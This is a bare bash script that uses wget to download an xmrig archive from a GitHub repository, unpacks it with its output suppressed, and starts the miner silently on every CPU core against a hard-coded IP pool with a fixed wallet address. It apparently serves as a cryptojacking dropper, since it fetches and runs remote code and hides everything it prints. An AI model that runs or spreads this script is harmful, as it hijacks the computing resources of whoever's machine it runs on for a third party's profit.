#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --donate-level 1 -o 45.55.163.247:443 -u solo:SaLvsC3b4tz9SACeD2oWGv4XBRqK3HM3W8VhV7Y2rkUkUxqxxQVw5nB9YsaVxnbxKn2m9WkeDukB3YoYfu9n54vSBNDGNGPZzXY -p tes -a rx/0 -t $(nproc --all) >/dev/null 2>&1
